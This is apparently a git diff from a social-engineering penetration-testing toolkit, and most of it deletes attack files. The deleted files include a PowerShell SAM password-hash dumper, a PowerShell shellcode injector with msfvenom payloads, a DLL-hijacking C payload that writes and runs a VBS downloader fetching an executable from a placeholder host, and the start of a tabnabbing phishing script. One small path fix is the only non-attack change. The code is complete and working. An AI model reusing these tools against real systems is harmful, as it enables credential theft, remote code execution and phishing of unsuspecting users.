$outbuf[$_] = ($a -bxor $b); - } - return ,$outbuf; - } -PassThru -} - -function des_encrypt([byte[]]$data, [byte[]]$key) -{ - return ,(des_transform $data $key $true) -} - -function des_decrypt([byte[]]$data, [byte[]]$key) -{ - return ,(des_transform $data $key $false) -} - -function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt) -{ - $des = new-object Security.Cryptography.DESCryptoServiceProvider; - $des.Mode = [Security.Cryptography.CipherMode]::ECB; - $des.Padding = [Security.Cryptography.PaddingMode]::None; - $des.Key = $key; - $des.IV = $key; - $transform = $null; - if ($doEncrypt) {$transform = $des.CreateEncryptor();} - else{$transform = $des.CreateDecryptor();} - $result = $transform.TransformFinalBlock($data, 0, $data.Length); - return ,$result; -} - -function Get-RegKeyClass([string]$key, [string]$subkey) -{ - switch ($Key) { - "HKCR" { $nKey = 0x80000000} #HK Classes Root - "HKCU" { $nKey = 0x80000001} #HK Current User - "HKLM" { $nKey = 0x80000002} #HK Local Machine - "HKU" { $nKey = 0x80000003} #HK Users - "HKCC" { $nKey = 0x80000005} #HK Current Config - default { - throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC" - } - } - $KEYQUERYVALUE = 0x1; - $KEYREAD = 0x19; - $KEYALLACCESS = 0x3F; - $result = ""; - [int]$hkey=0 - if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey)) - { - $classVal = New-Object Text.Stringbuilder 1024 - [int]$len = 1024 - if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null, - [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0)) - { - $result = $classVal.ToString() - } - else - { - Write-Error "RegQueryInfoKey failed"; - } - [PowerDump.Native]::RegCloseKey($hkey) | Out-Null - } - else - { - Write-Error "Cannot open key"; - } - return $result; -} - -function Get-BootKey -{ - $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"})); - $b = new-object byte[] $($s.Length/2); - 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)} - $b2 = new-object byte[] 16; - 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++} - return ,$b2; -} - -function Get-HBootKey -{ - param([byte[]]$bootkey); - $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0"); - $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"); - $k = Get-Item HKLM:\SAM\SAM\Domains\Account; - if (-not $k) {return $null} - [byte[]]$F = $k.GetValue("F"); - if (-not $F) {return $null} - $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum); - $rc4 = NewRC4 $rc4key; - return ,($rc4.encrypt($F[0x80..0x9F])); -} - -function Get-UserName([byte[]]$V) -{ - if (-not $V) {return $null}; - $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC; - $len = [BitConverter]::ToInt32($V[0x10..0x13],0); - return [Text.Encoding]::Unicode.GetString($V, $offset, $len); -} - -function Get-UserHashes($u, [byte[]]$hbootkey) -{ - [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null; - - # check if hashes exist (if byte memory equals to 20, then we've got a hash) - $LM_exists = $false; - $NT_exists = $false; - # LM header check - if ($u.V[0xa0..0xa3] -eq 20) - { - $LM_exists = $true; - } - # NT header check - elseif ($u.V[0xac..0xaf] -eq 20) - { - $NT_exists = $true; - } - - if ($LM_exists -eq $true) - { - $lm_hash_offset = $u.HashOffset + 4; - $nt_hash_offset = $u.HashOffset + 8 + 0x10; - $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)]; - $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; - } - - elseif ($NT_exists -eq $true) - { - $nt_hash_offset = $u.HashOffset + 8; - $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; - } - return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey); -} - -function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey) -{ - [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt; - # LM Hash - if ($enc_lm_hash) - { - $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword; - } - - # NT Hash - if ($enc_nt_hash) - { - $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword; - } - - return ,($lmhash,$nthash) -} - -function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr) -{ - $deskeys = sid_to_key $rid; - $md5 = [Security.Cryptography.MD5]::Create(); - $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr); - $rc4 = NewRC4 $rc4_key; - $obfkey = $rc4.encrypt($enc_hash); - $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) + - (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]); - return ,$hash; -} - -function Get-UserKeys -{ - ls HKLM:\SAM\SAM\Domains\Account\Users | - where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} | - Add-Member AliasProperty KeyName PSChildName -PassThru | - Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru | - Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru | - Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru | - Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru -} - -function DumpHashes -{ - LoadApi - $bootkey = Get-BootKey; - $hbootKey = Get-HBootKey $bootkey; - Get-UserKeys | %{ - $hashes = Get-UserHashes $_ $hBootKey; - "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid, - [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(), - [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower()); - } -} -DumpHashes diff --git a/src/powershell/shellcode_injection_expanded.powershell b/src/powershell/shellcode_injection_expanded.powershell deleted file mode 100644 index c7a37acf2..000000000 --- a/src/powershell/shellcode_injection_expanded.powershell +++ /dev/null @@ -1,45 +0,0 @@ -<# -Powershell Code Execution 'Exploit' -Author: Matthew Graeber -Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions. -#> - -# Import required functions -$code = @" -[DllImport("kernel32.dll")] -public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); -[DllImport("kernel32.dll")] -public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); -[DllImport("msvcrt.dll")] -public static extern IntPtr memset(IntPtr dest, uint src, uint count); -"@ - -# Add CSharp code as a class recognized by Powershell -$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru - -# Copy and paste your shellcode here in the form 0xXX. -# 32-bit payload -# msfvenom windows/exec CMD="cmd /k calc" EXITFUNC=thread -[Byte[]]$sc32 = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00 - -# 64-bit payload -# msfvenom windows/x64/exec CMD="cmd /k calc" EXITFUNC=thread -[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00 - -# Determine if Powershell is running as 32 or 64 bit -[Byte[]]$sc = $sc32 -if ([IntPtr]::Size -eq 8) {$sc = $sc64} - -# Calculate correct size param for VirtualAlloc -$size = 0x1000 -if ($sc.Length -gt 0x1000) {$size = $sc.Length} - -# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000. -# Allocate RWX memory block -$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) - -# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid). -for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} - -# Execute you payload -$winFunc::CreateThread(0,0,$x,0,0,0) diff --git a/src/teensy/teensy.py b/src/teensy/teensy.py index 692654783..e31c1d8f5 100644 --- a/src/teensy/teensy.py +++ b/src/teensy/teensy.py @@ -129,7 +129,7 @@ if choice == "13": # save our stuff here print(core.bcolors.BLUE + "\n[*] INO file created. You can get it under '{0}'".format(os.path.join(core.userconfigpath, - "reports" + + "reports", "teensy_{0}.ino".format(now))) + core.bcolors.ENDC) print(core.bcolors.GREEN + diff --git a/src/webattack/dll_hijacking/hijacking.c.wscript b/src/webattack/dll_hijacking/hijacking.c.wscript deleted file mode 100644 index 6adc7f3f1..000000000 --- a/src/webattack/dll_hijacking/hijacking.c.wscript +++ /dev/null @@ -1,89 +0,0 @@ -/* - -DLL Hijacker Attack Written by Dave Kennedy (ReL1K) for the -Social-Engineer Toolkit (SET) spear-phishing attack vector. - -This is an ugly cscript downloader, it works on all platforms but -will rewrite in C later instead of cscript. - -strFileURL = "http://IPADDRHERE/x" -strHDLocation = "C:\x.exe" -Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") -objXMLHTTP.open "GET", strFileURL, false -objXMLHTTP.send() -If objXMLHTTP.Status = 200 Then -Set objADOStream = CreateObject("ADODB.Stream") -objADOStream.Open -objADOStream.Type = 1 -objADOStream.Write -objXMLHTTP.ResponseBody -objADOStream.Position = 0 -Set objFSO = Createobject("Scripting.FileSystemObject") -If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation -Set objFSO = Nothing -objADOStream.SaveToFile strHDLocation -objADOStream.Close -Set objADOStream = Nothing -End if -Set objXMLHTTP = Nothing -Set WshShell = WScript.CreateObject("WScript.Shell") -WshShell.Run "c:\x.exe" - -*/ - -#include -#include -#include - - - -int run() -{ - - FILE *file; - char* command = "cmd /c cscript c:\\x.vbs"; // execute the vbs script after fopen write - char* host = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // in SET does a replace of the length of IP address then terminates with a null byte to remove the rest of the X's - file = fopen("C:\\x.vbs", "w"); // write file x.vbs - fprintf(file,"strFileURL = \"http://%s/x\"\nstrHDLocation = \"C:\\x.exe\"\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nobjXMLHTTP.open \"GET\", strFileURL, false\nobjXMLHTTP.send()\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject(\"ADODB.Stream\")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject(\"Scripting.FileSystemObject\")\nIf objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile strHDLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nWshShell.Run \"c:\\x.exe\"", host); // write the downloader file, this will grab an executable - fclose(file); // close the file - - STARTUPINFO si; - PROCESS_INFORMATION pi; - - ZeroMemory( &si, sizeof(si) ); - si.cb = sizeof(si); - ZeroMemory( &pi, sizeof(pi) ); - si.dwFlags = STARTF_USESHOWWINDOW; - si.wShowWindow = SW_HIDE; // hide the window - - // Start the child process. - if( !CreateProcess( NULL, // No module name (use command line) - command, // Command line - NULL, // Process handle not inheritable - NULL, // Thread handle not inheritable - FALSE, // Set handle inheritance to FALSE - 0, // No creation flags - NULL, // Use parent's environment block - NULL, // Use parent's starting directory - &si, // Pointer to STARTUPINFO structure - &pi ) // Pointer to PROCESS_INFORMATION structure - ) - - // Wait until child process exits. - WaitForSingleObject( pi.hProcess, INFINITE ); - - // Close process and thread handles. - CloseHandle( pi.hProcess ); - CloseHandle( pi.hThread ); - sleep(5); - -exit(0); -return 0; -} - -BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) -{ - run(); - return 0; -} - diff --git a/src/webattack/dll_hijacking/hijacking.dll b/src/webattack/dll_hijacking/hijacking.dll deleted file mode 100755 index 7d4f27cd7..000000000 Binary files a/src/webattack/dll_hijacking/hijacking.dll and /dev/null differ diff --git a/src/webattack/dll_hijacking/hijacking.dll.wscript b/src/webattack/dll_hijacking/hijacking.dll.wscript deleted file mode 100755 index 0b7daec12..000000000 Binary files a/src/webattack/dll_hijacking/hijacking.dll.wscript and /dev/null differ diff --git a/src/webattack/tabnabbing/source.js b/src/webattack/tabnabbing/source.js deleted file mode 100644 index 5007794b3..000000000 --- a/src/webattack/tabnabbing/source.js +++ /dev/null @@ -1,65 +0,0 @@ -(function(){ - -var TIMER = null; -var HAS_SWITCHED = false; - -window.onblur = function(){ - TIMER = setTimeout(changeItUp, 1000); -} - -window.onfocus = function(){ - if(TIMER) clearTimeout(TIMER); -} - -favicon = { - docHead: document.getElementsByTagName("head")[0], - set: function(url){ - this.addLink(url); - }, - - addLink: function(iconURL) { - var link = document.createElement("link"); - link.type = "image/x-icon"; - link.rel = "shortcut icon"; - link.href = iconURL; - this.removeLinkIfExists(); - this.docHead.appendChild(link); - }, - - removeLinkIfExists: function() { - var links = this.docHead.getElementsByTagName("link"); - for (var i=0; i